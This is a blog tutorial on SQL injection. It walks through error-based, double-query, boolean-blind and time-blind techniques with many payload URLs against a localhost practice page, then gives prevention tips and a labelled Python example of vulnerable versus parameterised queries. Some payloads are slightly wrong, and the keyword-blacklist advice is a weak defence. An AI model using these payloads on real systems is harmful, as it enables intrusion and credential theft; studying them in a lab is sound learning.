SQL INJECTION — The Coolest Vulnerability

Dheeraj Deshmukh
14 min read · Dec 29, 2020


gif from shahjerry33.medium.com

Hello everyone. In this blog we are going to learn all about SQL injection. I'm very excited to write this blog because it is one of my favourite vulnerabilities among the injection attacks. We will cover what SQL injection is, the types of SQL injection, techniques to perform an SQL injection attack, how to prevent your sites from SQL injection, and much more, with suitable examples and payloads. Let's start…

:::::: ATTACKING ON ANY SITE WITHOUT PERMISSION IS ILLEGAL ::::::

SQL Injection (SQLi) :-

As we know, in the OWASP (Open Web Application Security Project) Top 10, Injection has held the first position (A1) since 2010 and still does. SQL injection is a type of injection attack in which the attacker injects malicious SQL queries via the URL or any input box in order to get private or confidential information from the target's database. This private and confidential information includes admin IDs and passwords, bank details, identity details, trade secrets, government secrets and so on. If such information is leaked, the organization faces threats such as loss of revenue, loss of reputation and loss of privacy. The attack works on vulnerable web pages and apps that use a backend database like MySQL, Oracle or MSSQL. Through an SQL injection vulnerability the attacker is able to perform operations such as delete, update, modify and insert.

Understanding SQL injection with an example :-

  • Let us consider a government site in which all the data of property tax and income tax is saved.
  • An attacker wants to delete someone's property tax record.
  • To do this the attacker starts reconnaissance on that site, and after that he finds an SQL injection vulnerability in it.
  • The attacker then runs a malicious query and deletes the record from the database.
  • Besides this, he gets the ID and password of the site's admin panel from the database, through which he can access the admin panel and get full access over the site.
  • In the above example the attacker gives the database a query that works according to the attacker. Now replace the word "give" with "inject", which means the same thing here.
  • So finally we can say that the process of injecting a malicious query into the database so that it works according to the attacker is known as SQL injection.

An SQL injection vulnerability is not a vulnerability of any software or server; it is a vulnerability of the code, which arises when unsanitized input is taken.

Types of SQL injection :-

There are mainly three types of SQL injection :

  • Error Based SQL Injection
  • Union Based SQL Injection
  • Blind SQL Injection

Blind injection is further divided into two types :

  • Boolean-Based Blind SQL Injection
  • Time-Based Blind SQL Injection

[1] ERROR BASED SQL INJECTION :-

When the attacker gives arbitrary input via the URL or an input box in order to run a malicious query, the database generates some kind of error if the query does not work properly. From this error the attacker learns the structure of the query or database as defined by the developer, and then reconstructs the query according to the errors until it is in working condition. Because errors are shown in this vulnerability, it is known as Error Based SQL Injection.

Performing the attack :-

The attack is performed in the following 4 steps —

  1. Break the query.
  2. Join the query.
  3. Find the number of columns.
  4. Run a second select query and find the place in the output from which we get the database name, table names, column names and the data in the columns.

STEP — 1

Break the query :-

The term "break the query" means generating errors by giving arbitrary input. In this step the attacker identifies how the query is written, in order to execute the malicious query.

Following are the ways to break the query :-

  • Single quote :- '
  • Double quote :- "
  • Bracket :- )
  • Single quote with bracket :- ')
  • Double quote with bracket :- ")
  • Backslash :- \
  • Sometimes we don't need to break the query; we can perform the injection directly without breaking it.

Examples and payloads of query break :-

Requirements :-

  • MySQL
  • Apache2
  • PHP

First you have to create a file and a database to practise this.

Creating Database :-

I assume that you know MySQL and are able to create a database. If you can't, then you have to learn MySQL first so that you are able to understand this properly.

  • Click here to create the database for this.
  • Now our database is ready.
  • Make a connection file db_config.php to connect our page to the database.
  • Our connection file is ready.
  • Now make a PHP file to perform the SQL injection attack.
  • File name :- error-based-injection-1.php

content :-

In the above example the id parameter is in single quotes, so in this example our query is broken with a single quote.

  • Open your browser and browse to your file.

http://localhost/error-based-injection-1.php?id=1

You get the username and password of the first person.

  • Now break the query to perform SQL injection :-
  1. Single quote :-

Payload :-

http://localhost/error-based-injection-1.php?id=1'

In this way we can break the query.

2. Single quote with bracket :-

$query = "SELECT * from users where id=('$id') LIMIT 0,1";

Payload:- http://localhost/error-based-injection-1.php?id=1')

3. Brackets :-

$query = "SELECT * from users where id=($id) LIMIT 0,1";

Payload:- http://localhost/error-based-injection-1.php?id=1)

4. Double quotes with bracket :-

$id = '"' . $id . '"';
$query = "SELECT * from users where id=($id) LIMIT 0,1";

Payload:- http://localhost/error-based-injection-1.php?id=1")

5. Nothing to do :-

$query = "SELECT * from users where id=$id LIMIT 0,1";

Payload:- http://localhost/error-based-injection-1.php?id=1

STEP — 2

Join the query :-

Joining the query means completing the broken query so that the malicious query runs without any error.

Following are some ways to join the query :-

  • --+
  • --%20
  • %23 (the URL-encoded value of the hash sign #)
  • or 1 = '1

Payloads :-

Payload:- http://localhost/error-based-injection-1.php?id=1'--+

Payload:- http://localhost/error-based-injection-1.php?id=1'--%20

Payload:- http://localhost/error-based-injection-1.php?id=1' %23

Payload:- http://localhost/error-based-injection-1.php?id=1' or 1 = '1

Payload:- http://localhost/error-based-injection-1.php?id=1' or '1

In this way we can join the query.

STEP — 3

Find the number of columns :-

  • Now we have to find out the number of columns using order by.
  • To know how many columns are in the table we use order by with increasing numbers, and whenever we get an error, the previous number is the number of columns present in the table.
  • Payload :-

Payload:- http://localhost/error-based-injection-1.php?id=1' order by 1,2,3 --+

Payload:- http://localhost/error-based-injection-1.php?id=1' order by 1,2,3,4--+

With this we get an error.

  • This confirms that there are 3 columns present in the table.

STEP — 4

Run a second select query and find the place in the output from which we get data :-

  • To run a second select query we use union all select.
  • From step 3 we know that there are 3 columns in the table.
  • Payload :-

Payload:- http://localhost/error-based-injection-1.php?id=1' union all select 1,2,3--+

  • Now we can get data in any of columns 1, 2 or 3.
  1. Find the database name :-

Function :- database( )

Payload :-

http://localhost/error-based-injection-1.php?id=1' union all select 1,database(),3--+

We get the database name in the place of the second column.

2. Find the username :-

Function :- current_user( )

Payload :-

http://localhost/error-based-injection-1.php?id=1' union all select 1,current_user(),3--+

We get the username.

3. Find the table names :-

— Now we use information_schema to find out all the information.

Payload -1 :- Get the table names one by one.

http://localhost/error-based-injection-1.php?id=1' union all select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1--+

  • users is your first table name.
  • To get the name of another table, increase the limit.
  • limit 2,1 gets the second table name if it exists.
  • limit 3,1 gets the third table name if it exists, and this process continues till the last table.

Payload -2 :- Get all the table names at once.

http://localhost/error-based-injection-1.php?id=1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

  • We get all the table names from the database at once.
  • In my database 4 tables are present.

4. Find the column names :-

We find out the column names of the users table.

Payload :- 1

http://localhost/error-based-injection-1.php?id=1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

  • We have 3 columns: id, username and password.
  • Sometimes this payload does not work; then use the second payload.

Payload :- 2

http://localhost/error-based-injection-1.php?id=1' union all select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='users' limit 1,1--+

  • We get the first column name because the limit is 1,1.
  • Now we increase the limit and extract all the column names from the users table: limit 2,1, limit 3,1 and so on …
  • Now we have the table name and the column names; the next step is to extract data from the columns.

5. Extract the data :-

Payload :- 1

http://localhost/error-based-injection-1.php?id=1' union all select group_concat(id),group_concat(username),group_concat(password) from users where table_schema=database()--+

  • We get all the data from the table at once.
  • If you get any error then you should run it one column at a time.

Payload :- 2

http://localhost/error-based-injection-1.php?id=1' union all select id,username,password from users --+

  • Finally we get all the data.

[2] UNION BASED INJECTION :-

image by :- security Idiots !!

In this injection we get data on screen, but that data is constant, not from the database: it always looks the same and gives no errors. If we break the query it gives us a blank page, and when we join the query the same data is shown on the screen again. In this case we have to generate an error, and in that error we get all our data.

Code of this file :-

File name :- union-based-injection.php

Payloads :-

  • To find the database name :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a , floor(rand()*2))a from information_schema.tables group by a)b)--+

You will get the database name between ::: and :::, and if you can't get it, refresh again and again.

  • To find the username :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select current_user()),0x3a,0x3a , floor(rand()*2))a from information_schema.tables group by a)b)--+

You will get the username between ::: and :::, and if you can't get it, refresh again and again.

  • To find the table names :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— You will get the first table name from this; now we have to increase the limit and find out all the table names.

— We will get the table name between ::: and :::, and if you can't get it, refresh again and again.

  • Find the column names of the table :-

Let us suppose we got the table name users from the above step.

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='user' and table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— You will get the first column name from this; now we have to increase the limit and find out all the column names from the table user.

— We will get the column name between ::: and :::, and if you can't get it, refresh again and again.

  • Find the data from the columns :-

Let us say we have the column names id, name, username and password.

Payload for id :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select id from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

Payload for name :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select name from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

Payload for username :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select username from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

Payload for password :-

http://localhost/sql_injection/union-based-injection.php?id=1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select password from user where table_schema = database() limit 0,1),0x3a,0x3a , floor(rand()*5))a from information_schema.tables group by a)b)--+

— In this way we can get the whole data from the first row.

— For the data of the second row, increase the limit to 1,0 and start again the same as above.

  • And finally we get all the data from the table.

[3] Blind Injection :-

image by :- digitalmunition

Its name says everything about this injection: here "blind" means no errors. We are unable to see any errors, and we are also not able to generate errors as in the union based injection; in this case we use blind SQL injection. This injection gives us answers as yes or no. We ask the site whether the database name is less than 5 characters; if yes, it shows the content of the page normally, and if no, something is missing from the content of the page. It seems as though the database is talking with us, and this is a wonderful vulnerability.

Blind SQL injection is further divided into two types :-

  1. Boolean Based SQL injection
  2. Time Based SQL injection

BOOLEAN BASED SQL INJECTION :-

In this SQL injection we ask the database a yes-or-no question and the database answers yes or no; this is simply the functionality of the database. Such conditions occur whenever the error handling of the database is not working properly. Every site has lots of vulnerabilities no matter how secure it is; the threat of hacking always hangs over every site and server, and it all depends on the skills and techniques of the hacker. Most sites are affected by blind SQL injection and XSS injection attacks.

In boolean based injection we talk with the database in numbers and characters, and also through the ASCII values of signs, symbols and characters.

Following are some example payloads of boolean based blind SQL injection :-

Payload :- 1

  • To find the length of the database name :-

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) > 5)--+

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) < 6)--+

http://localhost/boolean-based-injection.php?id=1' AND (select length(database()) = 5)--+

  • Find out the database name :-

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),1,1)) < 110 )--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),1,1)) = 108 )--+

http://localhost/boolean-based-injection.php?id=1' AND (select ascii(substr(database(),2,1)) >108 )--+

— Increase the substr position from 1,1 to 2,1, 3,1 …

— Here the characters are checked by their ASCII value.

  • Find out the number of tables and the table name lengths :-

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) = 3--+

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 1,1) < 5--+

http://localhost/boolean-based-injection.php?id=1' AND ( select length(table_name) from information_schema.tables where table_schema=database() limit 0,1) > 10--+

— Increase the limit from 1,1 to 2,1, 3,1 …

— We can find both the number of tables present in the database and also the length of each table name.

  • Find out the table name :-

http://localhost/boolean-based-injection.php?id=1' AND ( select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1) > 105--+

http://localhost/boolean-based-injection.php?id=1' AND ( select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 1,1) = 103--+

— Increase both the substr position and the limit from 1,1 to 2,1, 3,1 …

— In this way we can extract all the data.

— The disadvantage of this is that it takes a lot of time to perform this injection manually; that is why we use automated tools like sqlmap or Python scripts.

TIME BASED SQL INJECTION :-

In this injection we identify the answers from the site by making it sleep for some specific time, like 10 or 5 seconds, to find out whether our answer is correct or not. If our answer is correct then it sleeps for the defined time, and if the answer is wrong the site does not sleep. In this way this injection also makes the database talkative.

Following are some example payloads of time based blind SQL injection :-

  • Find the database :-

select if((select database())='sqli', sleep(10), null);

  • Find the length of the table name :-

select if((select length(table_name) from information_schema.tables where table_schema = database() limit 0,1)=6, sleep(10), null);

  • Find the name of the table :-

select if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema = database() limit 0,1)=115, sleep(10), null);

— In this way we can find all the data from the database.

[*] PREVENTION FROM THE SQL INJECTION

  • The first and most important thing to prevent SQL injection is to sanitize and properly validate the input taken from users, so that attackers are unable to inject malicious queries.
  • Set a limit on the input length; for example, if we take a username from the user then validate it to 30 characters, as no username contains more than 30 characters.
  • Whitelist the allowed characters and numbers.
  • Blacklist the words used in malicious queries, like union, sleep, if etc., so that if an attacker tries to attack using these queries the site denies permission and blocks the attacker, as Cloudflare does. Cloudflare instantly shows a block message to the attacker.
  • Don't rely on a firewall to protect against SQL injection; it is only a myth that a firewall protects the site from SQL injection attacks.
  • Use a different server for the database rather than the web server; then if attackers attack the web server they are unable to reach the database server.
  • Don't rely on an SSL certificate; using SSL does not make your site safe, as the only job of SSL is to transmit data safely from the web server to the user's browser.
  • Do not connect your application to the database using an account with root access. Using a limited-access account is safer.
  • The safest way is to write secure code with proper validation, provide only the necessary functionality to the users, and check your code again and again to make sure that there is no loophole for the attackers.
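To make the prevention points concrete, here is an added example that is not part of the original post: the tutorial's `SELECT * from users where id='$id'` shape rebuilt in Python with SQLite (so it runs stand-alone; the PHP/MySQL version has the same shape), beside a hardened lookup that validates the id and binds it as a parameter. The table, rows and passwords are constructed sample data.

```python
import sqlite3

# Constructed sample rows standing in for the tutorial's 3-column users table.
SAMPLE_USERS = [(1, "admin", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "qwerty")]


def make_db():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Same shape as the tutorial's $query: the raw parameter is spliced into the SQL text."""
    query = f"SELECT id, username FROM users WHERE id='{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Hardened version: allow-list validation plus a parameterised query."""
    # Validation: an id must be a short string of decimal digits and nothing else.
    if not (user_id.isdigit() and len(user_id) <= 10):
        return []
    # Parameterisation: the value is sent separately from the SQL text, so a
    # quote, comment marker or keyword inside it can never change the query.
    return conn.execute(
        "SELECT id, username FROM users WHERE id=?", (int(user_id),)
    ).fetchall()


def demo():
    """Run both lookups on a normal id and on two of the tutorial's payload shapes."""
    conn = make_db()
    inputs = {
        "benign": "1",
        # 'join the query' shape: the OR makes the WHERE clause always true
        "or_join": "1' or '1'='1",
        # 'second select' shape; SQLite accepts -- without the space MySQL needs after it
        "union": "1' union all select username,password from users--",
    }
    return {
        name: (lookup_vulnerable(conn, value), lookup_safe(conn, value))
        for name, value in inputs.items()
    }


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print(f"{name:8s} vulnerable -> {vuln}\n         safe       -> {safe}")
```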

Thank you for reading this blog.

If you have any doubt regarding this then feel free to contact me.

You can follow me on LinkedIn and Twitter:

Linkedin :- https://www.linkedin.com/in/dheeraj-deshmukh-65b7901a4/

Twitter :- https://twitter.com/dheeraj_deshmuk
